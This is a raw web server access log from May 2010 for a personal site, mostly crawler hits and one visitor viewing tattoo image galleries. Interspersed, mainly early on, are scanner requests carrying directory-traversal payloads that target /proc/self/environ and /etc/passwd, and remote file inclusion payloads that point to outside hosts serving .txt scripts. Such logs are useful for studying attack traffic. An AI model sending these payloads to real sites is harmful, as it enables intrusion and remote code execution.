69.175.8.98 - - [19/May/2010:20:48:15 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
69.175.51.250 - - [19/May/2010:20:48:15 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
69.175.8.98 - - [19/May/2010:20:48:15 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
69.175.51.250 - - [19/May/2010:20:48:15 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
87.250.255.243 - - [19/May/2010:20:51:25 -0500] "GET /logs/access_log.1182124800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
80.65.166.74 - - [19/May/2010:20:53:23 -0500] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
80.65.166.74 - - [19/May/2010:20:53:23 -0500] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
80.65.166.74 - - [19/May/2010:20:53:23 -0500] "GET /logs/access_log.1264118400//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
69.175.51.250 - - [19/May/2010:20:54:21 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
69.175.51.250 - - [19/May/2010:20:54:22 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
69.175.51.250 - - [19/May/2010:20:54:22 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
69.175.51.250 - - [19/May/2010:20:54:23 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
69.175.51.250 - - [19/May/2010:20:54:23 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
69.175.51.250 - - [19/May/2010:20:54:23 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
69.175.8.98 - - [19/May/2010:20:55:10 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
69.175.8.98 - - [19/May/2010:20:55:10 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
83.69.115.198 - - [19/May/2010:20:55:10 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
83.69.115.198 - - [19/May/2010:20:55:10 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
69.175.8.98 - - [19/May/2010:20:55:10 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
83.69.115.198 - - [19/May/2010:20:55:11 -0500] "GET /logs/access_log.1272844800//index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
69.175.8.98 - - [19/May/2010:20:55:12 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
69.175.8.98 - - [19/May/2010:20:55:12 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
69.175.8.98 - - [19/May/2010:20:55:12 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
87.250.255.243 - - [19/May/2010:20:56:00 -0500] "GET /logs/access_log.1176940800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.175.51.250 - - [19/May/2010:20:59:53 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
69.175.8.98 - - [19/May/2010:20:59:58 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
69.175.51.250 - - [19/May/2010:21:00:03 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
69.175.8.98 - - [19/May/2010:21:00:08 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
87.250.255.243 - - [19/May/2010:21:01:30 -0500] "GET /logs/access_log.1210636800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
208.115.111.248 - - [19/May/2010:21:01:30 -0500] "GET /logs/access_log.1217116800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:21:01:32 -0500] "GET /logs/access_log.1217203200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:21:01:34 -0500] "GET /logs/access_log.1217894400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:21:01:37 -0500] "GET /logs/access_log.1218153600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:21:01:39 -0500] "GET /logs/access_log.1218672000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:21:01:41 -0500] "GET /logs/access_log.1218758400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:21:01:44 -0500] "GET /logs/access_log.1218931200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:21:01:46 -0500] "GET /logs/access_log.1219017600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:21:01:49 -0500] "GET /logs/access_log.1219708800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:21:01:51 -0500] "GET /logs/access_log.1219881600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
80.65.166.74 - - [19/May/2010:21:05:25 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
80.65.166.74 - - [19/May/2010:21:05:25 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
80.65.166.74 - - [19/May/2010:21:05:25 -0500] "GET /logs/access_log.1272844800%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
87.250.255.243 - - [19/May/2010:21:07:00 -0500] "GET /logs/access_log.1180569600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.195.226 - - [19/May/2010:21:07:35 -0500] "GET /logs/access_log.1236297600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
80.67.23.184 - - [19/May/2010:21:07:50 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 315 "-""libwww-perl/5.808"
80.67.23.184 - - [19/May/2010:21:07:50 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 310 "-""libwww-perl/5.808"
174.121.158.8 - - [19/May/2010:21:08:28 -0500] "GET /logs//index.php?option=com_appointment&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""-"
174.121.158.8 - - [19/May/2010:21:08:28 -0500] "GET //index.php?option=com_appointment&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""-"
174.121.158.8 - - [19/May/2010:21:08:28 -0500] "GET //index.php?option=com_appointment&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 294 "-""-"
174.121.158.8 - - [19/May/2010:21:08:28 -0500] "GET /logs//index.php?option=com_appointment&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 299 "-""-"
87.250.255.243 - - [19/May/2010:21:11:35 -0500] "GET /logs/access_log.1210464000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
66.249.65.51 - - [19/May/2010:21:14:22 -0500] "GET /logs/access_log.1210896000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
121.88.4.141 - - [19/May/2010:21:16:03 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
87.250.255.243 - - [19/May/2010:21:17:05 -0500] "GET /logs/access_log.1196812800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [19/May/2010:21:20:55 -0500] "GET /logs/access_log.1193443200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.195.227 - - [19/May/2010:21:23:05 -0500] "GET /logs/access_log.1192579200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.132 - - [19/May/2010:21:24:05 -0500] "GET /logs/access_log.1224028800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
75.247.8.71 - - [19/May/2010:21:26:25 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.bing.com/reference/semhtml?title=Flash_%28tattoo%29&fwd=1&qpvt=&src=abop&q=tattoo+flash""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:26:25 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
87.250.255.243 - - [19/May/2010:21:26:27 -0500] "GET /logs/access_log.1254700800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
75.247.8.71 - - [19/May/2010:21:26:32 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:26:32 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:26:32 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:26:32 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:26:33 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:26:33 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:26:33 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:26:33 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:26:33 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:26:33 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:26:34 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:26:34 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:26:44 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:26:45 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:26:45 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:26:45 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:26:46 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:26:46 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:26:47 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:26:47 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:26:47 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:26:47 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:26:47 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:27:02 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:27:03 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:27:03 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:27:03 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:27:03 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:27:03 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:27:03 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:27:03 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:27:04 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:27:04 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:27:04 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:27:20 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:27:20 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:27:20 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:27:21 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:27:21 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:27:21 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
75.247.8.71 - - [19/May/2010:21:27:21 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
